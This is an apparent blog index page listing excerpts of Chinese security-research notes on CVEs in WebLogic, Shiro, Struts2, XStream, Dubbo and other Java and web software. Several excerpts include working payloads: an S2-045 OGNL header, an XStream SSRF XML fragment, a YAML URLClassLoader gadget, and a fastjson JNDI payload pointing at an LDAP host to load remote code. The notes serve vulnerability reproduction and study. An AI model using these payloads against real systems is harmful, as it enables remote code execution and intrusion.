
Web
文章平均质量分 59
caiqiiqi
这个作者很懒,什么都没留下…
展开
-
[CVE-2018-2894] WebLogic文件上传漏洞
CVE-2018-2894:/ws_utc 这个路径的文件上传漏洞两个上传接口触发点:/ws_utc/resources/ws/config/import/ws_utc/config.do本poc以前者为例,进行poc和利用。上传成功之后会响应500,抛出NullPointerException,但是利用已经成功。关于weblogic各版本的可利用情况:10.3.6版本上未发现该功能,需手动开启:登录控制台-》配置-》高级-》勾选启用Web服务测试页 -》保存12.1.3.0默认开启原创 2021-03-29 14:13:39 · 1034 阅读 · 0 评论 -
VMware vCenter任意文件读取漏洞
参考:https://twitter.com/ptswarm/status/1316016337550938122【安全风险通告】VMware vCenter任意文件读取漏洞安全风险通告安装:https://blog.youkuaiyun.com/shida_csdn/article/details/82863169https://www.miensi.com/352.html安装有点麻烦,算了。下载:https://my.vmware.com/en/web/vmware/downloads/det原创 2020-10-15 10:31:18 · 2414 阅读 · 0 评论 -
[CVE-2020-13924] Apache Ambari任意文件下载
安装方式:http://ambari.apache.org/install.htmlhttps://blog.e-zest.com/installing-and-setting-hdfs-cluster-through-ambari来源:https://seclists.org/oss-sec/2021/q1/116原创 2021-02-08 10:42:13 · 1676 阅读 · 0 评论 -
Apache Druid远程代码执行漏洞[CVE-2021-25646]
安装教程:参考:https://druid.apache.org/docs/latest/tutorials/index.html执行用户提供的脚本:https://druid.apache.org/docs/latest/development/javascript.html原创 2021-02-01 14:09:49 · 766 阅读 · 1 评论 -
[CVE-2020-17532] Apache servicecomb-java-chassis Yaml remote deserialization vulnerability
修复的commit还有测试用例都在里面:https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c又是yaml反序列化:!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]或者:!!javax.script.原创 2021-01-21 20:24:50 · 497 阅读 · 0 评论 -
关于WebLogic中的Netuix
参考:https://docs.oracle.com/cd/E13218_01/wlp/docs81/whitepapers/netix/body.html需要配置一个xml格式的.portal文件。像jsp文件可以包含其他jsp文件一样,.portal文件可以包含其他.pinc文件。原创 2021-01-20 19:28:21 · 402 阅读 · 1 评论 -
JumpServer未授权RCE
参考https://saucer-man.com/information_security/520.htmlhttps://blog.riskivy.com/jumpserver-%e4%bb%8e%e4%bf%a1%e6%81%af%e6%b3%84%e9%9c%b2%e5%88%b0%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/https://www.o2oxy原创 2021-01-19 11:54:24 · 1184 阅读 · 1 评论 -
反序列化新的Gadget:com.sun.jndi.ldap.LdapAttribute
这个CTF是1.4的Java。同时由于这个类在1.8中依然存在,所以也可以在1.8利用:一些新手可能会被 ysoserial 里标注的利用链依赖库版本所迷惑,认为某个链就只能在对应标注的依赖版本下起作用,其实并非如此。像 ysoserial 里 CommonsBeanutils1 这个链,作者标注的依赖版本是:commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2但这些版本实际上反映的只是 ysoserial 作者在原创 2021-01-14 12:00:28 · 1349 阅读 · 0 评论 -
鉴权/认证框架Spring Security和Apache Shiro比较
参考:https://www.cnblogs.com/minxiang-luo/p/12492905.htmlhttps://www.javadevjournal.com/spring-boot/spring-boot-application-intellij/松哥手把手教你在 SpringBoot 中防御 CSRF 攻击!so easy!打开IDEA => File => New => Project,选择选择 Spring Initializr如果IDEA自动下载的依赖中原创 2021-01-13 17:42:34 · 1675 阅读 · 0 评论 -
Laravel <= v8.4.2 debug mode: Remote code execution
步骤:$ git clone https://github.com/laravel/laravel.git$ cd laravel$ git checkout e849812$ composer install$ composer require facade/ignition==2.5.1$ php artisan serve安装composer:curl -sS https://getcomposer.org/installer -o composer-setup.phpsudo p原创 2021-01-13 11:27:55 · 768 阅读 · 1 评论 -
Apache Flink漏洞CVE-2020-17518
参考:https://www.freebuf.com/vuls/260257.htmlhttps://www.anquanke.com/post/id/227668原创 2021-01-08 19:15:19 · 738 阅读 · 0 评论 -
alibaba nacos
下载地址:https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.zip安装启动方法:cd nacos\bin.\startup.cmd -m standalone启动输出:PS C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\bin> .\startup.cmd -m st原创 2020-12-31 11:26:31 · 2936 阅读 · 0 评论 -
Dubbo新漏洞
Dubbo的反序列化漏洞比较:[CVE-2019-17564] 当用户选择http协议进行通信时,Apache Dubbo 将接受来自消费者远程调用的POST请求并执行一个反序列化的操作。由于此步骤没有任何安全校验,因此可以造成反序列化执行任意代码。[CVE-2020-1948] 默认反序列化方式存在代码执行漏洞,当 Dubbo 服务端暴露时(默认端口:20880),攻击者可以发送未经验证的服务名或方法名的RPC请求,同时配合附加恶意的参数负载。当恶意参数被反序列化时,它将执行恶意代码。参考:ht原创 2020-12-25 14:22:39 · 2294 阅读 · 0 评论 -
[CVE-2020-35476] OpenTSDB <=2.4.0 RCE
安装条件:ZookeeperHBaseZookeeperwget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.6.2/apache-zookeeper-3.6.2.tar.gzcd confcp zoo_sample.cfg zoo.cfgvi zoo.cfg# 修改dataDir=data,然后启动bin/zkServer.sh startHBaseopentsdb的后端数据存储依赖于HB原创 2020-12-21 16:52:01 · 1271 阅读 · 0 评论 -
helm安装
参考:https://helm.sh/docs/intro/install/https://github.com/helm/helm/releaseshttps://blog.sonatype.com/how-to-use-nexus-repository-and-helm-for-ci/cd如何使用Sonatype Nexus管理Helm Charts原创 2020-12-18 17:20:39 · 227 阅读 · 1 评论 -
Gitlab 任意文件读取漏洞(CVE-2016-9086)以及gitlab SSRF to redis
使用vulhub的环境:https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2016-9086任意文件读取漏洞(CVE-2016-9086):GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13任意用户authentication_token泄露漏洞:Gitlab CE/EE versions 8.10.3-8.10.5docker起来之后是这样:新建项目的时候有一个从Gitl原创 2020-12-16 16:07:08 · 1278 阅读 · 0 评论 -
[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞
漏洞详情CVE-2020-26259:任意文件删除。CVE-2020-26258:SSRF细节poc[CVE-2020-26258] SSRF<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class='com.sun.xml.internal.bind.v2.run原创 2020-12-15 11:22:19 · 3510 阅读 · 8 评论 -
AMF反序列化/XXE/SSRF漏洞
参考:CVE-2017-5641Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default.Adobe/Apache Flex Java library历史原因:Flex BlazeDS by Adobe (retired, contributed Flex原创 2020-12-04 11:16:15 · 4162 阅读 · 0 评论 -
一次Spring Boot+mysql+mybatis排错[java.sql.SQLSyntaxErrorException: Unknown error 1146]
运行spring boot项目(mybatis),运行之后,报错:### SQL: SELECT id, ...email,username FROM xx_user WHERE (username = ?)### Cause: java.sql.SQLSyntaxErrorException: Unknown error 1146; bad SQL grammar []; nested exception is java.sql.SQLSyntaxErrorException: Unk原创 2020-11-11 14:39:43 · 4947 阅读 · 0 评论 -
xxl-job 执行器 RESTful API 未授权访问 RCE
参考:https://www.buaq.net/go-43356.htmlhttps://github.com/jas502n/xxl-jobhttps://landgrey.me/blog/18/环境搭建下载源码git clone https://github.com/xuxueli/xxl-job.git打开文件xxl-job/xxl-job-executor-samples/xxl-job-executor-sample-springboot/src/main/resources原创 2020-11-10 14:27:07 · 1899 阅读 · 0 评论 -
bash常用代码
bash常用代码原创 2017-05-18 16:24:53 · 3280 阅读 · 1 评论 -
[CVE-2020-13935] Tomcat WebSocket拒绝服务漏洞
影响范围9.0.0.M1~9.0.3610.0.0-M1~10.0.0-M68.5.0~8.5.567.0.27~7.0.104修复建议升级到修复版本http://tomcat.apache.org/缓解措施:若无特殊需要,关闭Tomcat Websocket功能,删除example下的websocket示例。漏洞检测:判断版本判断examples的websocket页面是否存在漏洞利用效果:端口可访问;服务不可用。升级之后的效果:使用之前的利用方式无法造成DOS效果。原创 2020-11-09 14:04:45 · 2850 阅读 · 3 评论 -
[CVE-2020-14882/CVE-2020-14883]weblogioc http console认证绕过+任意代码执行
参考:CVE-2020-14882 weblogic 未授权命令执行复现https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbfAdministrator@cqq MINGW64 /e/Oracle/Middleware12.2.1.3$ grep -rn "com.tangosol.coherence.mvel2.sh.ShellSession"原创 2020-10-29 12:48:39 · 3435 阅读 · 4 评论 -
Shiro Padding Oracle Attack
#TODO参考:我对Padding Oracle攻击的分析和思考(详细)Shiro Padding Oracle Attack 反序列化Apache Shiro源码浅析之从远古洞到最新PaddingOracle CBChttps://github.com/threedr3am/marshalsec#2-shiropaddingoraclecbcpadding oracle 原理深度解析 & CBC 字节翻转攻击原理解析...原创 2020-10-26 14:44:17 · 608 阅读 · 1 评论 -
JMX RMI服务
参考:Tomcat开启JMX远程监控在catalina.bat文件中新增SET CATALINA_OPTS= %CATALINA_OPTS% -Dcom.sun.management.jmxremoteSET CATALINA_OPTS= %CATALINA_OPTS% -Dcom.sun.management.jmxremote.port=7199SET CATALINA_OPTS= %CATALINA_OPTS% -Dcom.sun.management.jmxremote.ssl=fal原创 2020-10-22 20:05:00 · 706 阅读 · 2 评论 -
[CVE-2020-13933]Shiro权限绕过导致的Nexus漏洞
参考:https://support.sonatype.com/hc/en-us/articles/360053556313-CVE-2020-13933-Nexus-Repository-Manger-2-3-Shiro-Authentication-Bypasshttps://issues.sonatype.org/browse/NEXUS-25086https://help.aliyun.com/noticelist/articleid/1060730690.htmlhttps://gith原创 2020-10-22 15:51:44 · 1520 阅读 · 0 评论 -
[CVE-2020-9496]Apache Ofbiz RCE
参考:Apache Ofbiz RCE (CVE-2020-9496) 漏洞分析CVE-2020-9496 apache ofbiz xml-rpc反序列化漏洞分析https://www.zerodayinitiative.com/blog/2020/9/14/cve-2020-9496-rce-in-apache-ofbiz-xmlrpc-via-deserialization-of-untrusted-data如果遇到java.lang.UnsupportedClassVersionErr原创 2020-09-23 11:20:10 · 2681 阅读 · 0 评论 -
how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM笔记
参考:https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/发现Facebook 使用 MobileIron 當作他們的 MDM 解決方案。虽然官网没找到,但是通过google搜索到了开发商测试用的rpm包。通过分析代码,发现对外开放端口如下:443 為使用者裝置註冊介面8443 為設備管理介面9997 為一個 MobileIron 私有的裝置同步原创 2020-09-14 10:44:09 · 455 阅读 · 0 评论 -
spring boot的Thymeleaf模板注入
参考:java安全开发之spring boot Thymeleaf模板注入https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/https://github.com/veracode-research/spring-view-manipulation场景是view的名字是用户可控时,原创 2020-09-07 14:00:41 · 1620 阅读 · 0 评论 -
weblogic使用jdk7u21 gadget以及回显
参考:https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Jdk7u21.javaJava 反序列化漏洞始末(2)— JDK条件:jdk < = 7u21Weblogic与jdk的兼容性问题好像10.3.6不支持jdk 1.8,不过好像可以先用jdk 6,7安装之后然后bypass。https://stackoverflow.com/questions/22513660/原创 2020-09-03 17:10:01 · 919 阅读 · 0 评论 -
[CVE-2019-2725] Weblogc XMLDecoder RCE
主要看看回显方案,参考:https://github.com/iceMatcha/CNTA-2019-0014xCVE-2019-2725/blob/master/weblogic_rce.pyhttps://github.com/pimps/CVE-2019-2725/blob/master/weblogic_exploit.pyWeblogic 远程命令执行漏洞分析(CVE-2019-2725)及利用payload构造详细解读因为之前的补丁已经对xml的内容进行了限制:object、ne原创 2020-08-27 18:23:02 · 2051 阅读 · 0 评论 -
Struts2漏洞
S2-045POST /struts2-rest-showcase/orders/4 HTTP/1.1Host: cqq.com:8080Connection: closeContent-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',77*77)}.multipart/form-dataContent-Length: 2S2-052POST /s原创 2020-08-18 14:34:29 · 531 阅读 · 0 评论 -
[CVE-2019-17638]Jenkins自带Jetty的缓冲区损坏
参考:https://www.jenkins.io/security/advisory/2020-08-17/https://github.com/advisories/GHSA-x3rh-m7vp-35f2https://github.com/eclipse/jetty.project/issues/4936https://nvd.nist.gov/vuln/detail/2019-17638这样启动jenkins时使用的是Jenkins自带的jetty: java -jar jenkin原创 2020-08-18 14:28:55 · 1498 阅读 · 0 评论 -
[CVE-2020-9483/13921]Apache SkyWalking SQL注入
参考:https://www.weibo.com/ttarticle/p/show?id=2309404520814409023617编译好的6.5.0版本:wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gzcd apache-skywalking-apm-bin/binvi oapService.sh加上调试参数:DEBUG_OPTIONS="-agentlib原创 2020-08-07 11:22:59 · 3163 阅读 · 0 评论 -
[CVE-2020-14644]weblogic coherence 反序列化RCE via t3
参考:CVE-2020-14644 分析与 gadget 的一些思考漏洞调试com.tangosol.internal.util.invoke.RemotableSupportcom.tangosol.internal.util.invoke.RemoteConstructor使用作者给出的(12.2.1.3版本的?)这个md5值:E12ECA49F06D0401A9D406B2DCC7463A抛出了异常java.lang.NoClassDefFoundError: com/tangos原创 2020-08-06 16:27:21 · 1549 阅读 · 1 评论 -
[CVE-2020-14645]weblogic coherence 反序列化RCE via t3
影响版本:Weblogic 12.2.1.4.xWeblogic 12.2.1.4.0 Coherence 组件特有的类 com.tangosol.util.extractor.UniversalExtractor,因此只能影响 Weblogic 12.2.1.4.xJDK < 6u211/7u201/8u191由于是jndi注入,所以只影响JEP290之前的JDK版本参考https://www.cnblogs.com/potatsoSec/p/13307315.html原创 2020-07-20 17:53:11 · 1772 阅读 · 0 评论 -
Nginx启动停止
1、启动:C:\server\nginx-1.0.2>start nginx或C:\server\nginx-1.0.2>nginx.exe注:建议使用第一种,第二种会使你的cmd窗口一直处于执行中,不能进行其他命令操作。2、停止:C:\server\nginx-1.0.2>nginx.exe -s stop或C:\server\nginx-1.0.2>nginx.exe -s quit注:stop是快速停止nginx,可能并不保存相关信息;quit是完整有序的停止转载 2020-07-16 10:36:34 · 463 阅读 · 0 评论 -
[CVE-2020-11989]Apache Shiro权限绕过漏洞
影响范围:Shiro < 1.5.3Spring框架中只使用了Shiro鉴权环境搭建:https://github.com/threedr3am/learnjavabug/blob/master/shiro/auth-bypass(shiro%3C1.5.3)/注意这里配置的是:/bypass/*,而不是/bypass/**。/bypass/**是不能用这个漏洞来绕过的。这个洞利用价值不大,基本使用shiro做认证的系统,都会利用/** authc兜底利用方式一:通过访问原创 2020-07-09 10:28:56 · 6645 阅读 · 0 评论 -
Dubbo调用fastjson
其解析字符串默认使用的是fastjson,可以结合fastjson实现RCE。invoke ({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.85.1:8089/test_by_cqq", "autoCommit": true原创 2020-07-07 16:08:29 · 1163 阅读 · 0 评论 -
命令执行的poc编写
有回显的情况下,碰到可能存在的windows和linux平台,可以执行一个不存在的命令,然后报错返回里有Cannot run program即可。Windows:结果:原创 2020-06-03 16:55:56 · 1136 阅读 · 0 评论